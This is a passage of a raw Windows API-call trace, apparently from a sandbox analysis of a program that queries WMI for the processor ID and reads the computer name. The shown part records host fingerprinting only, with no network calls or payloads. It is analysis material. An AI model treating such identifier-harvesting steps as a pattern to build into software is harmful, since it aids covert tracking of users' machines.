[4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0064.627] WbemLocator:IUnknown:Release (This=0x12b6d9c) returned 0x3 [0064.627] CoGetContextToken (in: pToken=0xf2e374 | out: pToken=0xf2e374) returned 0x0 [0064.627] WbemLocator:IUnknown:AddRef (This=0x12b6e40) returned 0x4 [0064.627] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6e40, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e3e8 | out: ppvObject=0xf2e3e8*=0x12b6e24) returned 0x0 [0064.628] WbemLocator:IUnknown:Release (This=0x12b6e40) returned 0x4 [0064.628] WbemLocator:IRpcOptions:Query (in: This=0x12b6e24, pPrx=0x12b6e40, dwProperty=2, pdwValue=0xf2e40c | out: pdwValue=0xf2e40c) returned 0x80004002 [0064.628] WbemLocator:IUnknown:Release (This=0x12b6e24) returned 0x3 [0064.628] WbemLocator:IUnknown:Release (This=0x12b6e40) returned 0x2 [0064.628] CoGetContextToken (in: pToken=0xf2e7e8 | out: pToken=0xf2e7e8) returned 0x0 [0064.628] CoGetContextToken (in: pToken=0xf2e7a8 | out: pToken=0xf2e7a8) returned 0x0 [0064.628] WbemLocator:IUnknown:AddRef (This=0x12b6e40) returned 0x3 [0064.628] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6e40, riid=0xf2e824*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0xf2e820 | out: ppvObject=0xf2e820*=0x12b7fb0) returned 0x0 [0064.628] WbemLocator:IUnknown:Release (This=0x12b6e40) returned 0x3 [0064.628] IUnknown:Release (This=0x12b7fb0) returned 0x2 [0064.628] IUnknown:Release (This=0x12b7fb0) returned 0x1 [0064.628] SysStringLen (param_1=0x0) returned 0x0 [0064.628] GetLastError () returned 0x0 [0064.637] CoGetContextToken (in: pToken=0xf2eddc | out: pToken=0xf2eddc) returned 0x0 [0064.637] CoGetContextToken (in: pToken=0xf2ed9c | out: pToken=0xf2ed9c) returned 0x0 [0064.637] WbemLocator:IUnknown:AddRef (This=0x12b6e40) returned 0x2 [0064.637] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6e40, riid=0xf2ee18*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0xf2ee14 | out: ppvObject=0xf2ee14*=0x12b7fb0) returned 0x0 [0064.637] WbemLocator:IUnknown:Release (This=0x12b6e40) returned 0x2 [0064.637] IUnknown:AddRef (This=0x12b7fb0) returned 0x3 [0064.637] IEnumWbemClassObject:Reset (This=0x12b7fb0) returned 0x0 [0064.660] IUnknown:Release (This=0x12b7fb0) returned 0x2 [0064.662] CoGetContextToken (in: pToken=0xf2eccc | out: pToken=0xf2eccc) returned 0x0 [0064.662] IUnknown:AddRef (This=0x12b7fb0) returned 0x3 [0064.662] IEnumWbemClassObject:Next (in: This=0x12b7fb0, lTimeout=-1, uCount=0x1, apObjects=0x1271d78, puReturned=0x3278530 | out: apObjects=0x1271d78*=0x12b2968, puReturned=0x3278530*=0x1) returned 0x0 [0065.154] IUnknown:QueryInterface (in: This=0x12b2968, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e2d8 | out: ppvObject=0xf2e2d8*=0x12b2968) returned 0x0 [0065.154] IUnknown:QueryInterface (in: This=0x12b2968, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xf2e294 | out: ppvObject=0xf2e294*=0x0) returned 0x80004002 [0065.154] IUnknown:QueryInterface (in: This=0x12b2968, riid=0x7431e9fc*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xf2e188 | out: ppvObject=0xf2e188*=0x0) returned 0x80004002 [0065.154] IUnknown:AddRef (This=0x12b2968) returned 0x3 [0065.154] CoGetContextToken (in: pToken=0xf2e120 | out: pToken=0xf2e120) returned 0x0 [0065.154] CoGetContextToken (in: pToken=0xf2e0e4 | out: pToken=0xf2e0e4) returned 0x0 [0065.154] IUnknown:QueryInterface (in: This=0x126b490, riid=0x74384a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e118 | out: ppvObject=0xf2e118*=0x126b49c) returned 0x0 [0065.155] IComThreadingInfo:GetCurrentApartmentType (in: This=0x126b49c, pAptType=0xf2e148 | out: pAptType=0xf2e148*=3) returned 0x0 [0065.155] IUnknown:Release (This=0x126b49c) returned 0x1 [0065.155] IUnknown:QueryInterface (in: This=0x12b2968, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e108 | out: ppvObject=0xf2e108*=0x12b296c) returned 0x0 [0065.155] IMarshal:GetUnmarshalClass (in: This=0x12b296c, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xf2e110 | out: pCid=0xf2e110*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0065.155] IUnknown:Release (This=0x12b296c) returned 0x3 [0065.155] CoGetContextToken (in: pToken=0xf2e118 | out: pToken=0xf2e118) returned 0x0 [0065.155] IUnknown:AddRef (This=0x12b2968) returned 0x4 [0065.155] IUnknown:QueryInterface (in: This=0x12b2968, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e18c | out: ppvObject=0xf2e18c*=0x0) returned 0x80004002 [0065.155] IUnknown:Release (This=0x12b2968) returned 0x3 [0065.155] IUnknown:Release (This=0x12b2968) returned 0x2 [0065.155] CoGetContextToken (in: pToken=0xf2e578 | out: pToken=0xf2e578) returned 0x0 [0065.155] CoGetContextToken (in: pToken=0xf2e538 | out: pToken=0xf2e538) returned 0x0 [0065.155] IUnknown:AddRef (This=0x12b2968) returned 0x3 [0065.155] IUnknown:QueryInterface (in: This=0x12b2968, riid=0xf2e5b4*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xf2e5b0 | out: ppvObject=0xf2e5b0*=0x12b2968) returned 0x0 [0065.155] IUnknown:Release (This=0x12b2968) returned 0x3 [0065.155] IUnknown:Release (This=0x12b2968) returned 0x2 [0065.156] IUnknown:Release (This=0x12b2968) returned 0x1 [0065.156] IUnknown:Release (This=0x12b7fb0) returned 0x2 [0065.156] CoGetContextToken (in: pToken=0xf2ee60 | out: pToken=0xf2ee60) returned 0x0 [0065.156] IUnknown:AddRef (This=0x12b2968) returned 0x2 [0065.159] IWbemClassObject:Get (in: This=0x12b2968, wszName="__GENUS", lFlags=0, pVal=0xf2eedc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef90*=0, plFlavor=0xf2ef8c*=0 | out: pVal=0xf2eedc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0xf2ef90*=3, plFlavor=0xf2ef8c*=64) returned 0x0 [0065.159] IWbemClassObject:Get (in: This=0x12b2968, wszName="__PATH", lFlags=0, pVal=0xf2eebc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef74*=0, plFlavor=0xf2ef70*=0 | out: pVal=0xf2eebc*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef74*=8, plFlavor=0xf2ef70*=64) returned 0x0 [0065.162] IWbemClassObject:Get (in: This=0x12b2968, wszName="__RELPATH", lFlags=0, pVal=0xf2eebc*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef74*=8, plFlavor=0xf2ef70*=64 | out: pVal=0xf2eebc*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef74*=8, plFlavor=0xf2ef70*=64) returned 0x0 [0065.162] CoGetContextToken (in: pToken=0xf2ed94 | out: pToken=0xf2ed94) returned 0x0 [0065.162] CoGetContextToken (in: pToken=0xf2ed54 | out: pToken=0xf2ed54) returned 0x0 [0065.162] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x3 [0065.162] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2edd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edcc | out: ppvObject=0xf2edcc*=0x1289cd8) returned 0x0 [0065.162] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x3 [0065.162] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1289cd8, puCount=0xf2ef48 | out: puCount=0xf2ef48*=0x2) returned 0x0 [0065.162] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0065.162] CoGetContextToken (in: pToken=0xf2ed84 | out: pToken=0xf2ed84) returned 0x0 [0065.162] CoGetContextToken (in: pToken=0xf2ed44 | out: pToken=0xf2ed44) returned 0x0 [0065.162] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x3 [0065.162] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2edc0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edbc | out: ppvObject=0xf2edbc*=0x1289cd8) returned 0x0 [0065.163] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x3 [0065.163] WbemDefPath:IWbemPath:GetText (in: This=0x1289cd8, lFlags=4, puBuffLength=0xf2ef44*=0x0, pszText=0x0 | out: puBuffLength=0xf2ef44*=0x15, pszText=0x0) returned 0x0 [0065.163] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0065.163] CoGetContextToken (in: pToken=0xf2ed84 | out: pToken=0xf2ed84) returned 0x0 [0065.163] CoGetContextToken (in: pToken=0xf2ed44 | out: pToken=0xf2ed44) returned 0x0 [0065.163] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x3 [0065.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2edc0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edbc | out: ppvObject=0xf2edbc*=0x1289cd8) returned 0x0 [0065.163] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x3 [0065.163] WbemDefPath:IWbemPath:GetText (in: This=0x1289cd8, lFlags=4, puBuffLength=0xf2ef44*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2ef44*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0065.163] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0065.164] CoGetContextToken (in: pToken=0xf2ed68 | out: pToken=0xf2ed68) returned 0x0 [0065.164] CoGetContextToken (in: pToken=0xf2ed28 | out: pToken=0xf2ed28) returned 0x0 [0065.164] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x3 [0065.164] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2eda4*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2eda0 | out: ppvObject=0xf2eda0*=0x1289cd8) returned 0x0 [0065.164] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x3 [0065.164] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1289cd8, puCount=0xf2ef1c | out: puCount=0xf2ef1c*=0x2) returned 0x0 [0065.164] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0065.164] CoGetContextToken (in: pToken=0xf2ed58 | out: pToken=0xf2ed58) returned 0x0 [0065.164] CoGetContextToken (in: pToken=0xf2ed18 | out: pToken=0xf2ed18) returned 0x0 [0065.164] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x3 [0065.164] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2ed94*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed90 | out: ppvObject=0xf2ed90*=0x1289cd8) returned 0x0 [0065.164] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x3 [0065.164] WbemDefPath:IWbemPath:GetText (in: This=0x1289cd8, lFlags=4, puBuffLength=0xf2ef18*=0x0, pszText=0x0 | out: puBuffLength=0xf2ef18*=0x15, pszText=0x0) returned 0x0 [0065.164] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0065.164] CoGetContextToken (in: pToken=0xf2ed58 | out: pToken=0xf2ed58) returned 0x0 [0065.164] CoGetContextToken (in: pToken=0xf2ed18 | out: pToken=0xf2ed18) returned 0x0 [0065.164] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x3 [0065.164] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2ed94*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed90 | out: ppvObject=0xf2ed90*=0x1289cd8) returned 0x0 [0065.164] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x3 [0065.164] WbemDefPath:IWbemPath:GetText (in: This=0x1289cd8, lFlags=4, puBuffLength=0xf2ef18*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2ef18*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0065.164] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0065.165] IWbemClassObject:Get (in: This=0x12b2968, wszName="ProcessorId", lFlags=0, pVal=0xf2eed8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3278bec*=0, plFlavor=0x3278bf0*=0 | out: pVal=0xf2eed8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0F8BFBFF000506E3", varVal2=0x0), pType=0x3278bec*=8, plFlavor=0x3278bf0*=0) returned 0x0 [0065.165] SysStringLen (param_1="0F8BFBFF000506E3") returned 0x10 [0065.165] IWbemClassObject:Get (in: This=0x12b2968, wszName="ProcessorId", lFlags=0, pVal=0xf2eedc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3278bec*=8, plFlavor=0x3278bf0*=0 | out: pVal=0xf2eedc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0F8BFBFF000506E3", varVal2=0x0), pType=0x3278bec*=8, plFlavor=0x3278bf0*=0) returned 0x0 [0065.165] SysStringLen (param_1="0F8BFBFF000506E3") returned 0x10 [0065.165] CoGetContextToken (in: pToken=0xf2ed68 | out: pToken=0xf2ed68) returned 0x0 [0065.165] CoGetContextToken (in: pToken=0xf2ed28 | out: pToken=0xf2ed28) returned 0x0 [0065.165] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x3 [0065.165] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2eda4*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2eda0 | out: ppvObject=0xf2eda0*=0x1289cd8) returned 0x0 [0065.165] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x3 [0065.165] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1289cd8, puCount=0xf2ef1c | out: puCount=0xf2ef1c*=0x2) returned 0x0 [0065.165] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0065.165] CoGetContextToken (in: pToken=0xf2ed58 | out: pToken=0xf2ed58) returned 0x0 [0065.165] CoGetContextToken (in: pToken=0xf2ed18 | out: pToken=0xf2ed18) returned 0x0 [0065.165] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x3 [0065.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2ed94*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed90 | out: ppvObject=0xf2ed90*=0x1289cd8) returned 0x0 [0065.166] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x3 [0065.166] WbemDefPath:IWbemPath:GetText (in: This=0x1289cd8, lFlags=4, puBuffLength=0xf2ef18*=0x0, pszText=0x0 | out: puBuffLength=0xf2ef18*=0x15, pszText=0x0) returned 0x0 [0065.166] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0065.166] CoGetContextToken (in: pToken=0xf2ed58 | out: pToken=0xf2ed58) returned 0x0 [0065.166] CoGetContextToken (in: pToken=0xf2ed18 | out: pToken=0xf2ed18) returned 0x0 [0065.166] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x3 [0065.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2ed94*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed90 | out: ppvObject=0xf2ed90*=0x1289cd8) returned 0x0 [0065.166] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x3 [0065.166] WbemDefPath:IWbemPath:GetText (in: This=0x1289cd8, lFlags=4, puBuffLength=0xf2ef18*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2ef18*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0065.166] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0065.166] IWbemClassObject:Get (in: This=0x12b2968, wszName="ProcessorId", lFlags=0, pVal=0xf2eed8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3278cd4*=0, plFlavor=0x3278cd8*=0 | out: pVal=0xf2eed8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0F8BFBFF000506E3", varVal2=0x0), pType=0x3278cd4*=8, plFlavor=0x3278cd8*=0) returned 0x0 [0065.166] SysStringLen (param_1="0F8BFBFF000506E3") returned 0x10 [0065.166] IWbemClassObject:Get (in: This=0x12b2968, wszName="ProcessorId", lFlags=0, pVal=0xf2eedc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3278cd4*=8, plFlavor=0x3278cd8*=0 | out: pVal=0xf2eedc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0F8BFBFF000506E3", varVal2=0x0), pType=0x3278cd4*=8, plFlavor=0x3278cd8*=0) returned 0x0 [0065.166] SysStringLen (param_1="0F8BFBFF000506E3") returned 0x10 [0065.166] CoGetContextToken (in: pToken=0xf2eccc | out: pToken=0xf2eccc) returned 0x0 [0065.166] IUnknown:AddRef (This=0x12b7fb0) returned 0x3 [0065.167] IEnumWbemClassObject:Next (in: This=0x12b7fb0, lTimeout=-1, uCount=0x1, apObjects=0x1271d78, puReturned=0x3278530 | out: apObjects=0x1271d78*=0x0, puReturned=0x3278530*=0x0) returned 0x1 [0065.167] IUnknown:Release (This=0x12b7fb0) returned 0x2 [0065.168] CoGetContextToken (in: pToken=0xf2ee18 | out: pToken=0xf2ee18) returned 0x0 [0065.168] WbemLocator:IUnknown:Release (This=0x12b6e40) returned 0x1 [0065.168] IUnknown:Release (This=0x12b7fb0) returned 0x0 [0065.170] GetComputerNameW (in: lpBuffer=0x1271d60, nSize=0xf2ef9c | out: lpBuffer="LHNIWSJ", nSize=0xf2ef9c) returned 1 [0065.170] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x40c [0065.170] GetLastError () returned 0x0 [0065.171] SetEvent (hEvent=0x2b4) returned 1 [0065.171] GetLastError () returned 0x0 [0065.171] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xf2eee0*=0x40c, lpdwindex=0xf2ec98 | out: lpdwindex=0xf2ec98) returned 0x0 [0065.173] CoGetContextToken (in: pToken=0xf2ed30 | out: pToken=0xf2ed30) returned 0x0 [0065.173] CoGetContextToken (in: pToken=0xf2ecf0 | out: pToken=0xf2ecf0) returned 0x0 [0065.173] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x2 [0065.173] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed6c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed68 | out: ppvObject=0xf2ed68*=0x12b3f50) returned 0x0 [0065.173] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.173] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x1 [0065.173] CoGetContextToken (in: pToken=0xf2edb0 | out: pToken=0xf2edb0) returned 0x0 [0065.173] CoGetContextToken (in: pToken=0xf2ed70 | out: pToken=0xf2ed70) returned 0x0 [0065.173] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x2 [0065.174] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edec*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ede8 | out: ppvObject=0xf2ede8*=0x12b3f50) returned 0x0 [0065.174] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.174] WbemDefPath:IWbemPath:SetText (This=0x12b3f50, uMode=0x4, pszPath="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0065.174] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x1 [0065.174] CoGetContextToken (in: pToken=0xf2eda0 | out: pToken=0xf2eda0) returned 0x0 [0065.174] CoGetContextToken (in: pToken=0xf2ed60 | out: pToken=0xf2ed60) returned 0x0 [0065.174] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x2 [0065.174] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2eddc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edd8 | out: ppvObject=0xf2edd8*=0x12b3f50) returned 0x0 [0065.174] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.174] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x12b3f50, puCount=0xf2ef54 | out: puCount=0xf2ef54*=0x2) returned 0x0 [0065.174] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x1 [0065.174] CoGetContextToken (in: pToken=0xf2ed90 | out: pToken=0xf2ed90) returned 0x0 [0065.174] CoGetContextToken (in: pToken=0xf2ed50 | out: pToken=0xf2ed50) returned 0x0 [0065.174] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x2 [0065.174] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edcc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edc8 | out: ppvObject=0xf2edc8*=0x12b3f50) returned 0x0 [0065.174] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.174] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef50*=0x0, pszText=0x0 | out: puBuffLength=0xf2ef50*=0x15, pszText=0x0) returned 0x0 [0065.174] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x1 [0065.175] CoGetContextToken (in: pToken=0xf2ed90 | out: pToken=0xf2ed90) returned 0x0 [0065.175] CoGetContextToken (in: pToken=0xf2ed50 | out: pToken=0xf2ed50) returned 0x0 [0065.175] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x2 [0065.175] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edcc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edc8 | out: ppvObject=0xf2edc8*=0x12b3f50) returned 0x0 [0065.175] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.175] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef50*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2ef50*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0065.175] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x1 [0065.175] CoGetContextToken (in: pToken=0xf2ed84 | out: pToken=0xf2ed84) returned 0x0 [0065.175] CoGetContextToken (in: pToken=0xf2ed44 | out: pToken=0xf2ed44) returned 0x0 [0065.175] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x2 [0065.175] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edc0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edbc | out: ppvObject=0xf2edbc*=0x12b3f50) returned 0x0 [0065.175] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.175] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x12b3f50, puCount=0xf2ef38 | out: puCount=0xf2ef38*=0x2) returned 0x0 [0065.175] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x1 [0065.175] CoGetContextToken (in: pToken=0xf2ed74 | out: pToken=0xf2ed74) returned 0x0 [0065.175] CoGetContextToken (in: pToken=0xf2ed34 | out: pToken=0xf2ed34) returned 0x0 [0065.175] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x2 [0065.175] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edac | out: ppvObject=0xf2edac*=0x12b3f50) returned 0x0 [0065.175] 